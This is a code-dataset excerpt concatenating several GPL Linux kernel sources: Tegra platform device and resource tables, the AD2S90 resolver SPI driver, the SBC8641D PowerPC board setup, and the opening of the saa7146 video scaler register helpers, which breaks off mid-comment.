	[1] = {
		.start	= TEGRA_I2C_BASE,
		.end	= TEGRA_I2C_BASE + TEGRA_I2C_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource i2c_resource2[] = {
	[0] = {
		.start	= INT_I2C2,
		.end	= INT_I2C2,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_I2C2_BASE,
		.end	= TEGRA_I2C2_BASE + TEGRA_I2C2_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource i2c_resource3[] = {
	[0] = {
		.start	= INT_I2C3,
		.end	= INT_I2C3,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_I2C3_BASE,
		.end	= TEGRA_I2C3_BASE + TEGRA_I2C3_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

/* The DVC block is exposed as a fourth I2C controller. */
static struct resource i2c_resource4[] = {
	[0] = {
		.start	= INT_DVC,
		.end	= INT_DVC,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_DVC_BASE,
		.end	= TEGRA_DVC_BASE + TEGRA_DVC_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

struct platform_device tegra_i2c_device1 = {
	.name		= "tegra-i2c",
	.id		= 0,
	.resource	= i2c_resource1,
	.num_resources	= ARRAY_SIZE(i2c_resource1),
	.dev = {
		.platform_data = 0,
	},
};

struct platform_device tegra_i2c_device2 = {
	.name		= "tegra-i2c",
	.id		= 1,
	.resource	= i2c_resource2,
	.num_resources	= ARRAY_SIZE(i2c_resource2),
	.dev = {
		.platform_data = 0,
	},
};

struct platform_device tegra_i2c_device3 = {
	.name		= "tegra-i2c",
	.id		= 2,
	.resource	= i2c_resource3,
	.num_resources	= ARRAY_SIZE(i2c_resource3),
	.dev = {
		.platform_data = 0,
	},
};

struct platform_device tegra_i2c_device4 = {
	.name		= "tegra-i2c",
	.id		= 3,
	.resource	= i2c_resource4,
	.num_resources	= ARRAY_SIZE(i2c_resource4),
	.dev = {
		.platform_data = 0,
	},
};
/*
 * IRQ + MMIO resources and platform devices for the four Tegra SPI
 * controllers, bound to the "spi_tegra" driver.  The controllers use DMA,
 * hence the full 32-bit coherent DMA mask on each device.
 */
static struct resource spi_resource1[] = {
	[0] = {
		.start	= INT_S_LINK1,
		.end	= INT_S_LINK1,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SPI1_BASE,
		.end	= TEGRA_SPI1_BASE + TEGRA_SPI1_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource spi_resource2[] = {
	[0] = {
		.start	= INT_SPI_2,
		.end	= INT_SPI_2,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SPI2_BASE,
		.end	= TEGRA_SPI2_BASE + TEGRA_SPI2_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource spi_resource3[] = {
	[0] = {
		.start	= INT_SPI_3,
		.end	= INT_SPI_3,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SPI3_BASE,
		.end	= TEGRA_SPI3_BASE + TEGRA_SPI3_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource spi_resource4[] = {
	[0] = {
		.start	= INT_SPI_4,
		.end	= INT_SPI_4,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SPI4_BASE,
		.end	= TEGRA_SPI4_BASE + TEGRA_SPI4_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

struct platform_device tegra_spi_device1 = {
	.name		= "spi_tegra",
	.id		= 0,
	.resource	= spi_resource1,
	.num_resources	= ARRAY_SIZE(spi_resource1),
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device tegra_spi_device2 = {
	.name		= "spi_tegra",
	.id		= 1,
	.resource	= spi_resource2,
	.num_resources	= ARRAY_SIZE(spi_resource2),
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device tegra_spi_device3 = {
	.name		= "spi_tegra",
	.id		= 2,
	.resource	= spi_resource3,
	.num_resources	= ARRAY_SIZE(spi_resource3),
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device tegra_spi_device4 = {
	.name		= "spi_tegra",
	.id		= 3,
	.resource	= spi_resource4,
	.num_resources	= ARRAY_SIZE(spi_resource4),
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};
/*
 * IRQ + MMIO resources and platform devices for the four Tegra SDMMC
 * controllers, bound to the "sdhci-tegra" driver.
 */
static struct resource sdhci_resource1[] = {
	[0] = {
		.start	= INT_SDMMC1,
		.end	= INT_SDMMC1,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SDMMC1_BASE,
		.end	= TEGRA_SDMMC1_BASE + TEGRA_SDMMC1_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource sdhci_resource2[] = {
	[0] = {
		.start	= INT_SDMMC2,
		.end	= INT_SDMMC2,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SDMMC2_BASE,
		.end	= TEGRA_SDMMC2_BASE + TEGRA_SDMMC2_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource sdhci_resource3[] = {
	[0] = {
		.start	= INT_SDMMC3,
		.end	= INT_SDMMC3,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SDMMC3_BASE,
		.end	= TEGRA_SDMMC3_BASE + TEGRA_SDMMC3_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

static struct resource sdhci_resource4[] = {
	[0] = {
		.start	= INT_SDMMC4,
		.end	= INT_SDMMC4,
		.flags	= IORESOURCE_IRQ,
	},
	[1] = {
		.start	= TEGRA_SDMMC4_BASE,
		.end	= TEGRA_SDMMC4_BASE + TEGRA_SDMMC4_SIZE-1,
		.flags	= IORESOURCE_MEM,
	},
};

/* board files should fill in platform_data and register the devices
 * themselves.  See board-harmony.c for an example.
 */
struct platform_device tegra_sdhci_device1 = {
	.name		= "sdhci-tegra",
	.id		= 0,
	.resource	= sdhci_resource1,
	.num_resources	= ARRAY_SIZE(sdhci_resource1),
};

struct platform_device tegra_sdhci_device2 = {
	.name		= "sdhci-tegra",
	.id		= 1,
	.resource	= sdhci_resource2,
	.num_resources	= ARRAY_SIZE(sdhci_resource2),
};

struct platform_device tegra_sdhci_device3 = {
	.name		= "sdhci-tegra",
	.id		= 2,
	.resource	= sdhci_resource3,
	.num_resources	= ARRAY_SIZE(sdhci_resource3),
};

struct platform_device tegra_sdhci_device4 = {
	.name		= "sdhci-tegra",
	.id		= 3,
	.resource	= sdhci_resource4,
	.num_resources	= ARRAY_SIZE(sdhci_resource4),
};
/* USB controllers 1-3: MMIO register window plus controller IRQ. */
static struct resource tegra_usb1_resources[] = {
	[0] = {
		.start = TEGRA_USB_BASE,
		.end = TEGRA_USB_BASE + TEGRA_USB_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_USB,
		.end = INT_USB,
		.flags = IORESOURCE_IRQ,
	},
};

static struct resource tegra_usb2_resources[] = {
	[0] = {
		.start = TEGRA_USB2_BASE,
		.end = TEGRA_USB2_BASE + TEGRA_USB2_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_USB2,
		.end = INT_USB2,
		.flags = IORESOURCE_IRQ,
	},
};

static struct resource tegra_usb3_resources[] = {
	[0] = {
		.start = TEGRA_USB3_BASE,
		.end = TEGRA_USB3_BASE + TEGRA_USB3_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_USB3,
		.end = INT_USB3,
		.flags = IORESOURCE_IRQ,
	},
};
/* DMA mask shared by all three EHCI controllers (32-bit addressing). */
static u64 tegra_ehci_dmamask = DMA_BIT_MASK(32);

struct platform_device tegra_ehci1_device = {
	.name = "tegra-ehci",
	.id = 0,
	.dev = {
		.dma_mask = &tegra_ehci_dmamask,
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
	.resource = tegra_usb1_resources,
	.num_resources = ARRAY_SIZE(tegra_usb1_resources),
};

struct platform_device tegra_ehci2_device = {
	.name = "tegra-ehci",
	.id = 1,
	.dev = {
		.dma_mask = &tegra_ehci_dmamask,
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
	.resource = tegra_usb2_resources,
	.num_resources = ARRAY_SIZE(tegra_usb2_resources),
};

struct platform_device tegra_ehci3_device = {
	.name = "tegra-ehci",
	.id = 2,
	.dev = {
		.dma_mask = &tegra_ehci_dmamask,
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
	.resource = tegra_usb3_resources,
	.num_resources = ARRAY_SIZE(tegra_usb3_resources),
};
/* ARM performance monitoring unit: one interrupt per CPU core. */
static struct resource tegra_pmu_resources[] = {
	[0] = {
		.start = INT_CPU0_PMU_INTR,
		.end = INT_CPU0_PMU_INTR,
		.flags = IORESOURCE_IRQ,
	},
	[1] = {
		.start = INT_CPU1_PMU_INTR,
		.end = INT_CPU1_PMU_INTR,
		.flags = IORESOURCE_IRQ,
	},
};

struct platform_device tegra_pmu_device = {
	.name = "arm-pmu",
	.id = ARM_PMU_DEVICE_CPU,
	.num_resources = ARRAY_SIZE(tegra_pmu_resources),
	.resource = tegra_pmu_resources,
};
/* UART controllers A-E: MMIO register window plus IRQ each. */
static struct resource tegra_uarta_resources[] = {
	[0] = {
		.start = TEGRA_UARTA_BASE,
		.end = TEGRA_UARTA_BASE + TEGRA_UARTA_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_UARTA,
		.end = INT_UARTA,
		.flags = IORESOURCE_IRQ,
	},
};

static struct resource tegra_uartb_resources[] = {
	[0] = {
		.start = TEGRA_UARTB_BASE,
		.end = TEGRA_UARTB_BASE + TEGRA_UARTB_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_UARTB,
		.end = INT_UARTB,
		.flags = IORESOURCE_IRQ,
	},
};

static struct resource tegra_uartc_resources[] = {
	[0] = {
		.start = TEGRA_UARTC_BASE,
		.end = TEGRA_UARTC_BASE + TEGRA_UARTC_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_UARTC,
		.end = INT_UARTC,
		.flags = IORESOURCE_IRQ,
	},
};

static struct resource tegra_uartd_resources[] = {
	[0] = {
		.start = TEGRA_UARTD_BASE,
		.end = TEGRA_UARTD_BASE + TEGRA_UARTD_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_UARTD,
		.end = INT_UARTD,
		.flags = IORESOURCE_IRQ,
	},
};

static struct resource tegra_uarte_resources[] = {
	[0] = {
		.start = TEGRA_UARTE_BASE,
		.end = TEGRA_UARTE_BASE + TEGRA_UARTE_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
	[1] = {
		.start = INT_UARTE,
		.end = INT_UARTE,
		.flags = IORESOURCE_IRQ,
	},
};
/* UART platform devices A-E; the DMA mask is needed because the
 * "tegra_uart" driver uses the APB DMA engine for transfers. */
struct platform_device tegra_uarta_device = {
	.name = "tegra_uart",
	.id = 0,
	.num_resources = ARRAY_SIZE(tegra_uarta_resources),
	.resource = tegra_uarta_resources,
	.dev = {
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
};

struct platform_device tegra_uartb_device = {
	.name = "tegra_uart",
	.id = 1,
	.num_resources = ARRAY_SIZE(tegra_uartb_resources),
	.resource = tegra_uartb_resources,
	.dev = {
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
};

struct platform_device tegra_uartc_device = {
	.name = "tegra_uart",
	.id = 2,
	.num_resources = ARRAY_SIZE(tegra_uartc_resources),
	.resource = tegra_uartc_resources,
	.dev = {
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
};

struct platform_device tegra_uartd_device = {
	.name = "tegra_uart",
	.id = 3,
	.num_resources = ARRAY_SIZE(tegra_uartd_resources),
	.resource = tegra_uartd_resources,
	.dev = {
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
};

struct platform_device tegra_uarte_device = {
	.name = "tegra_uart",
	.id = 4,
	.num_resources = ARRAY_SIZE(tegra_uarte_resources),
	.resource = tegra_uarte_resources,
	.dev = {
		.coherent_dma_mask = DMA_BIT_MASK(32),
	},
};
/* I2S controllers 1-2: IRQ, APB-DMA request selector and MMIO window. */
static struct resource i2s_resource1[] = {
	[0] = {
		.start = INT_I2S1,
		.end = INT_I2S1,
		.flags = IORESOURCE_IRQ
	},
	[1] = {
		.start = TEGRA_DMA_REQ_SEL_I2S_1,
		.end = TEGRA_DMA_REQ_SEL_I2S_1,
		.flags = IORESOURCE_DMA
	},
	[2] = {
		.start = TEGRA_I2S1_BASE,
		.end = TEGRA_I2S1_BASE + TEGRA_I2S1_SIZE - 1,
		.flags = IORESOURCE_MEM
	}
};

static struct resource i2s_resource2[] = {
	[0] = {
		.start = INT_I2S2,
		.end = INT_I2S2,
		.flags = IORESOURCE_IRQ
	},
	[1] = {
		.start = TEGRA_DMA_REQ_SEL_I2S2_1,
		.end = TEGRA_DMA_REQ_SEL_I2S2_1,
		.flags = IORESOURCE_DMA
	},
	[2] = {
		.start = TEGRA_I2S2_BASE,
		.end = TEGRA_I2S2_BASE + TEGRA_I2S2_SIZE - 1,
		.flags = IORESOURCE_MEM
	}
};
/* I2S controller devices. */
struct platform_device tegra_i2s_device1 = {
	.name = "tegra-i2s",
	.id = 0,
	.resource = i2s_resource1,
	.num_resources = ARRAY_SIZE(i2s_resource1),
};

struct platform_device tegra_i2s_device2 = {
	.name = "tegra-i2s",
	.id = 1,
	.resource = i2s_resource2,
	.num_resources = ARRAY_SIZE(i2s_resource2),
};

/* Digital Audio Switch (DAS): routes audio between I2S ports and codecs;
 * registers live in the APB_MISC block. */
static struct resource tegra_das_resources[] = {
	[0] = {
		.start = TEGRA_APB_MISC_DAS_BASE,
		.end = TEGRA_APB_MISC_DAS_BASE + TEGRA_APB_MISC_DAS_SIZE - 1,
		.flags = IORESOURCE_MEM,
	},
};

struct platform_device tegra_das_device = {
	.name = "tegra-das",
	.id = -1,
	.num_resources = ARRAY_SIZE(tegra_das_resources),
	.resource = tegra_das_resources,
};

/* ALSA PCM (DMA) device; no MMIO resources of its own. */
struct platform_device tegra_pcm_device = {
	.name = "tegra-pcm-audio",
	.id = -1,
};
| gpl-2.0 |
PyYoshi/caf-msm | drivers/staging/iio/resolver/ad2s90.c | 2308 | 3510 | /*
* ad2s90.c simple support for the ADI Resolver to Digital Converters: AD2S90
*
* Copyright (c) 2010-2010 Analog Devices Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
*/
#include <linux/types.h>
#include <linux/mutex.h>
#include <linux/device.h>
#include <linux/spi/spi.h>
#include <linux/slab.h>
#include <linux/sysfs.h>
#include "../iio.h"
#include "../sysfs.h"
#define DRV_NAME "ad2s90"

/* Per-device driver state for one AD2S90 resolver-to-digital converter. */
struct ad2s90_state {
	struct mutex lock;		/* serializes SPI transfers and rx/tx buffer use */
	struct iio_dev *idev;		/* the allocated/registered IIO device */
	struct spi_device *sdev;	/* underlying SPI slave */
	u8 rx[2];			/* receive buffer: 12-bit angle packed into two bytes */
	u8 tx[2];			/* bytes clocked out during the read */
};
static ssize_t ad2s90_show_angular(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct spi_message msg;
struct spi_transfer xfer;
int ret;
ssize_t len = 0;
u16 val;
struct iio_dev *idev = dev_get_drvdata(dev);
struct ad2s90_state *st = idev->dev_data;
xfer.len = 1;
xfer.tx_buf = st->tx;
xfer.rx_buf = st->rx;
mutex_lock(&st->lock);
spi_message_init(&msg);
spi_message_add_tail(&xfer, &msg);
ret = spi_sync(st->sdev, &msg);
if (ret)
goto error_ret;
val = (((u16)(st->rx[0])) << 4) | ((st->rx[1] & 0xF0) >> 4);
len = sprintf(buf, "%d\n", val);
error_ret:
mutex_unlock(&st->lock);
return ret ? ret : len;
}
/* single read-only "angular" sysfs attribute exposing the converter output */
#define IIO_DEV_ATTR_SIMPLE_RESOLVER(_show) \
	IIO_DEVICE_ATTR(angular, S_IRUGO, _show, NULL, 0)

/* constant human-readable description attribute */
static IIO_CONST_ATTR(description,
	"Low Cost, Complete 12-Bit Resolver-to-Digital Converter");

static IIO_DEV_ATTR_SIMPLE_RESOLVER(ad2s90_show_angular);

static struct attribute *ad2s90_attributes[] = {
	&iio_const_attr_description.dev_attr.attr,
	&iio_dev_attr_angular.dev_attr.attr,
	NULL,
};

/* group named after the driver so attributes appear under "ad2s90/" */
static const struct attribute_group ad2s90_attribute_group = {
	.name = DRV_NAME,
	.attrs = ad2s90_attributes,
};

static const struct iio_info ad2s90_info = {
	.attrs = &ad2s90_attribute_group,
	.driver_module = THIS_MODULE,
};
/*
 * Probe: allocate driver state and an IIO device, configure the SPI bus
 * parameters the AD2S90 needs, then register with the IIO core.
 *
 * Fixes versus the original:
 *  - spi_setup() is called (and its return value checked) BEFORE
 *    iio_device_register(), so userspace can never reach a registered
 *    device whose bus parameters are not yet configured, and a setup
 *    failure now makes the probe fail instead of being ignored.
 */
static int __devinit ad2s90_probe(struct spi_device *spi)
{
	struct ad2s90_state *st;
	int ret = 0;

	st = kzalloc(sizeof(*st), GFP_KERNEL);
	if (st == NULL) {
		ret = -ENOMEM;
		goto error_ret;
	}
	spi_set_drvdata(spi, st);

	mutex_init(&st->lock);
	st->sdev = spi;
	st->idev = iio_allocate_device(0);
	if (st->idev == NULL) {
		ret = -ENOMEM;
		goto error_free_st;
	}
	st->idev->dev.parent = &spi->dev;
	st->idev->info = &ad2s90_info;
	st->idev->dev_data = (void *)(st);
	st->idev->modes = INDIO_DIRECT_MODE;

	/* need 600ns between CS and the first falling edge of SCLK */
	spi->max_speed_hz = 830000;
	spi->mode = SPI_MODE_3;
	ret = spi_setup(spi);
	if (ret < 0)
		goto error_free_dev;

	ret = iio_device_register(st->idev);
	if (ret)
		goto error_free_dev;

	return 0;

error_free_dev:
	iio_free_device(st->idev);
error_free_st:
	kfree(st);
error_ret:
	return ret;
}
/*
 * Remove: unregister from the IIO core and free the driver state.
 * NOTE(review): there is no matching iio_free_device() here — presumably
 * iio_device_unregister() drops the device's last reference in this IIO
 * version; verify against the IIO core of this kernel tree.
 */
static int __devexit ad2s90_remove(struct spi_device *spi)
{
	struct ad2s90_state *st = spi_get_drvdata(spi);

	iio_device_unregister(st->idev);
	kfree(st);

	return 0;
}
/* SPI driver glue */
static struct spi_driver ad2s90_driver = {
	.driver = {
		.name = DRV_NAME,
		.owner = THIS_MODULE,
	},
	.probe = ad2s90_probe,
	.remove = __devexit_p(ad2s90_remove),
};

/* module entry point: register the SPI driver */
static __init int ad2s90_spi_init(void)
{
	return spi_register_driver(&ad2s90_driver);
}
module_init(ad2s90_spi_init);

/* module exit point: unregister the SPI driver */
static __exit void ad2s90_spi_exit(void)
{
	spi_unregister_driver(&ad2s90_driver);
}
module_exit(ad2s90_spi_exit);

MODULE_AUTHOR("Graff Yang <graff.yang@gmail.com>");
MODULE_DESCRIPTION("Analog Devices AD2S90 Resolver to Digital SPI driver");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
jrfastab/Linux-Kernel-QOS | arch/powerpc/platforms/86xx/sbc8641d.c | 2820 | 2614 | /*
* SBC8641D board specific routines
*
* Copyright 2008 Wind River Systems Inc.
*
* By Paul Gortmaker (see MAINTAINERS for contact information)
*
* Based largely on the 8641 HPCN support by Freescale Semiconductor Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*/
#include <linux/stddef.h>
#include <linux/kernel.h>
#include <linux/pci.h>
#include <linux/kdev_t.h>
#include <linux/delay.h>
#include <linux/seq_file.h>
#include <linux/of_platform.h>
#include <asm/time.h>
#include <asm/machdep.h>
#include <asm/pci-bridge.h>
#include <asm/prom.h>
#include <mm/mmu_decl.h>
#include <asm/udbg.h>
#include <asm/mpic.h>
#include <sysdev/fsl_pci.h>
#include <sysdev/fsl_soc.h>
#include "mpc86xx.h"
/* Board setup: announce the board, bring up the secondary CPU on SMP
 * configurations, and let the FSL PCI code assign the primary bus. */
static void __init
sbc8641_setup_arch(void)
{
	if (ppc_md.progress)
		ppc_md.progress("sbc8641_setup_arch()", 0);

	printk("SBC8641 board from Wind River\n");

#ifdef CONFIG_SMP
	mpc86xx_smp_init();
#endif

	fsl_pci_assign_primary();
}
/* /proc/cpuinfo hook: report the board vendor and the SVR register. */
static void
sbc8641_show_cpuinfo(struct seq_file *m)
{
	uint svr = mfspr(SPRN_SVR);

	seq_printf(m, "Vendor\t\t: Wind River Systems\n");
	seq_printf(m, "SVR\t\t: 0x%x\n", svr);
}
/*
 * Called very early, device-tree isn't unflattened
 */
static int __init sbc8641_probe(void)
{
	unsigned long root = of_get_flat_dt_root();

	/* claim the machine iff the root node carries our compatible string */
	return of_flat_dt_is_compatible(root, "wind,sbc8641") ? 1 : 0;
}
/*
 * Early time init: zero the timebase and enable it via HID0[TBEN]
 * before the decrementer is calibrated.
 */
static long __init
mpc86xx_time_init(void)
{
	unsigned int temp;

	/* Set the time base to zero */
	mtspr(SPRN_TBWL, 0);
	mtspr(SPRN_TBWU, 0);

	/* enable the timebase bit in HID0 */
	temp = mfspr(SPRN_HID0);
	temp |= HID0_TBEN;
	mtspr(SPRN_HID0, temp);
	/* make sure the HID0 update has taken effect before returning */
	asm volatile("isync");

	return 0;
}
/* bus node types whose children get probed as platform devices */
static __initdata struct of_device_id of_bus_ids[] = {
	{ .compatible = "simple-bus", },
	{ .compatible = "gianfar", },
	{ .compatible = "fsl,mpc8641-pcie", },
	{},
};

/* walk the device tree and create platform devices under the buses above */
static int __init declare_of_platform_devices(void)
{
	of_platform_bus_probe(NULL, of_bus_ids, NULL);
	return 0;
}
machine_arch_initcall(sbc8641, declare_of_platform_devices);
/* machine description: wires the board callbacks into the ppc core */
define_machine(sbc8641) {
	.name = "SBC8641D",
	.probe = sbc8641_probe,
	.setup_arch = sbc8641_setup_arch,
	.init_IRQ = mpc86xx_init_irq,
	.show_cpuinfo = sbc8641_show_cpuinfo,
	.get_irq = mpic_get_irq,
	.restart = fsl_rstcr_restart,
	.time_init = mpc86xx_time_init,
	.calibrate_decr = generic_calibrate_decr,
	.progress = udbg_progress,
#ifdef CONFIG_PCI
	.pcibios_fixup_bus = fsl_pcibios_fixup_bus,
#endif
};
| gpl-2.0 |
ac100-ru/linux | drivers/media/common/saa7146/saa7146_hlp.c | 4100 | 30791 | #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/kernel.h>
#include <linux/export.h>
#include <media/saa7146_vv.h>
/* Fold the palette code into the upper half of the clip-format register
 * value, leaving the lower 16 bits untouched. */
static void calculate_output_format_register(struct saa7146_dev* saa, u32 palette, u32* clip_format)
{
	u32 upper;

	/* distribute the three palette nibbles onto their register fields */
	upper  = ((palette & 0xf00) >> 8) << 30;
	upper |=  (palette & 0x00f)       << 24;
	upper |= ((palette & 0x0f0) >> 4) << 16;

	/* keep the low word, replace the high word */
	*clip_format = (*clip_format & 0x0000ffff) | upper;
}
/* Encode the HPS input source (bits 31:30) and sync selection (bit 28)
 * into the given control-register value. */
static void calculate_hps_source_and_sync(struct saa7146_dev *dev, int source, int sync, u32* hps_ctrl)
{
	u32 ctrl = *hps_ctrl;

	/* drop the old source/sync bits, then insert the new selection */
	ctrl &= ~(MASK_30 | MASK_31 | MASK_28);
	ctrl |= (source << 30) | (sync << 28);

	*hps_ctrl = ctrl;
}
/*
 * Program the horizontal (hxo) and vertical (hyo) input offsets of the
 * current video standard into the scaler register values.
 */
static void calculate_hxo_and_hyo(struct saa7146_vv *vv, u32* hps_h_scale, u32* hps_ctrl)
{
	int hyo = 0, hxo = 0;

	hyo = vv->standard->v_offset;
	hxo = vv->standard->h_offset;

	/* horizontal offset occupies the low bits of HPS_H_SCALE */
	*hps_h_scale &= ~(MASK_B0 | 0xf00);
	*hps_h_scale |= (hxo << 0);

	/* vertical offset sits at bit 12 of HPS_CTRL */
	*hps_ctrl &= ~(MASK_W0 | MASK_B2);
	*hps_ctrl |= (hyo << 12);
}
/* helper functions for the calculation of the horizontal- and vertical
   scaling registers, clip-format-register etc ...
   these functions take pointers to the (most-likely read-out
   original-values) and manipulate them according to the requested
   changes.
*/

/* hps_coeff used for CXY and CXUV; scale 1/1 -> scale 1/64 */
/* indexed by (prescale factor - 1); each entry pairs the filter
   coefficient with the weight sum used to pick the attenuation below */
static struct {
	u16 hps_coeff;
	u16 weight_sum;
} hps_h_coeff_tab [] = {
	{0x00, 2}, {0x02, 4}, {0x00, 4}, {0x06, 8}, {0x02, 8},
	{0x08, 8}, {0x00, 8}, {0x1E, 16}, {0x0E, 8}, {0x26, 8},
	{0x06, 8}, {0x42, 8}, {0x02, 8}, {0x80, 8}, {0x00, 8},
	{0xFE, 16}, {0xFE, 8}, {0x7E, 8}, {0x7E, 8}, {0x3E, 8},
	{0x3E, 8}, {0x1E, 8}, {0x1E, 8}, {0x0E, 8}, {0x0E, 8},
	{0x06, 8}, {0x06, 8}, {0x02, 8}, {0x02, 8}, {0x00, 8},
	{0x00, 8}, {0xFE, 16}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8},
	{0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8},
	{0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8},
	{0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0xFE, 8}, {0x7E, 8},
	{0x7E, 8}, {0x3E, 8}, {0x3E, 8}, {0x1E, 8}, {0x1E, 8},
	{0x0E, 8}, {0x0E, 8}, {0x06, 8}, {0x06, 8}, {0x02, 8},
	{0x02, 8}, {0x00, 8}, {0x00, 8}, {0xFE, 16}
};

/* table of attenuation values for horizontal scaling */
static u8 h_attenuation[] = { 1, 2, 4, 8, 2, 4, 8, 16, 0};
/* calculate horizontal scale registers */
/*
 * Derive the horizontal prescaler/scaler register values needed to map
 * in_x input pixels onto out_x output pixels, optionally mirrored
 * (flip_lr).  Returns 0 on success, -EINVAL for a zero output width.
 */
static int calculate_h_scale_registers(struct saa7146_dev *dev,
	int in_x, int out_x, int flip_lr,
	u32* hps_ctrl, u32* hps_v_gain, u32* hps_h_prescale, u32* hps_h_scale)
{
	/* horizontal prescaler */
	u32 dcgx = 0, xpsc = 0, xacm = 0, cxy = 0, cxuv = 0;
	/* horizontal scaler */
	u32 xim = 0, xp = 0, xsci =0;
	/* vertical scale & gain */
	u32 pfuv = 0;
	/* helper variables */
	u32 h_atten = 0, i = 0;

	/* a zero output width would divide by zero below */
	if ( 0 == out_x ) {
		return -EINVAL;
	}

	/* mask out vanity-bit */
	*hps_ctrl &= ~MASK_29;

	/* calculate prescale-(xspc)-value:	[n   .. 1/2) : 1
						[1/2 .. 1/3) : 2
						[1/3 .. 1/4) : 3
						... */
	if (in_x > out_x) {
		xpsc = in_x / out_x;
	}
	else {
		/* zooming */
		xpsc = 1;
	}

	/* if flip_lr-bit is set, number of pixels after
	   horizontal prescaling must be < 384 */
	if ( 0 != flip_lr ) {
		/* set vanity bit */
		*hps_ctrl |= MASK_29;

		while (in_x / xpsc >= 384 )
			xpsc++;
	}
	/* if zooming is wanted, number of pixels after
	   horizontal prescaling must be < 768 */
	else {
		while ( in_x / xpsc >= 768 )
			xpsc++;
	}

	/* maximum prescale is 64 (p.69) */
	if ( xpsc > 64 )
		xpsc = 64;

	/* keep xacm clear*/
	xacm = 0;

	/* set horizontal filter parameters (CXY = CXUV) */
	cxy = hps_h_coeff_tab[( (xpsc - 1) < 63 ? (xpsc - 1) : 63 )].hps_coeff;
	cxuv = cxy;

	/* calculate and set horizontal fine scale (xsci) */

	/* bypass the horizontal scaler ? */
	if ( (in_x == out_x) && ( 1 == xpsc ) )
		xsci = 0x400;
	else
		xsci = ( (1024 * in_x) / (out_x * xpsc) ) + xpsc;

	/* set start phase for horizontal fine scale (xp) to 0 */
	xp = 0;

	/* set xim, if we bypass the horizontal scaler */
	if ( 0x400 == xsci )
		xim = 1;
	else
		xim = 0;

	/* if the prescaler is bypassed, enable horizontal
	   accumulation mode (xacm) and clear dcgx */
	if( 1 == xpsc ) {
		xacm = 1;
		dcgx = 0;
	} else {
		xacm = 0;
		/* get best match in the table of attenuations
		   for horizontal scaling */
		h_atten = hps_h_coeff_tab[( (xpsc - 1) < 63 ? (xpsc - 1) : 63 )].weight_sum;

		for (i = 0; h_attenuation[i] != 0; i++) {
			if (h_attenuation[i] >= h_atten)
				break;
		}

		dcgx = i;
	}

	/* the horizontal scaling increment controls the UV filter
	   to reduce the bandwidth to improve the display quality,
	   so set it ... */
	if ( xsci == 0x400)
		pfuv = 0x00;
	else if ( xsci < 0x600)
		pfuv = 0x01;
	else if ( xsci < 0x680)
		pfuv = 0x11;
	else if ( xsci < 0x700)
		pfuv = 0x22;
	else
		pfuv = 0x33;

	/* merge the computed fields into the caller's register values */
	*hps_v_gain &= MASK_W0|MASK_B2;
	*hps_v_gain |= (pfuv << 24);

	*hps_h_scale &= ~(MASK_W1 | 0xf000);
	*hps_h_scale |= (xim << 31) | (xp << 24) | (xsci << 12);

	*hps_h_prescale |= (dcgx << 27) | ((xpsc-1) << 18) | (xacm << 17) | (cxy << 8) | (cxuv << 0);

	return 0;
}
/* vertical filter coefficients, indexed by the sequence-length interval
